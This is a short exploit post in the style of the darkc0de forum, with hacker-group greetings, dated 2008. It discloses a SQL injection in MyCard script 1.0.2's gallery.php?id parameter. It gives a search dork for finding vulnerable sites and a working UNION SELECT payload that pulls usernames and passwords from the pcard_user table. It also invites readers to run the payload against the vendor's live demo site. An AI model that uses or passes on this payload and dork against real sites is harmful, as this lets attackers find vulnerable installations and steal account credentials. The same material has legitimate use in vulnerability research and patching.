# est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # #-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # # and all darkc0de and NikTrix members ---# ################################################################ # # Author: r45c4l # # Home : www.darkc0de.com & niktrix.info # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection # # VEndor: http://www.tufat.com/s_business_card_designer.htm # # ########################################################### # # d0rk: Powered by MyCard # ########################################################### POC :- http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* Live Demo: For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this : http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/* ########################################################### # # Bug discovered : 28 Sep.2008 ###########################################################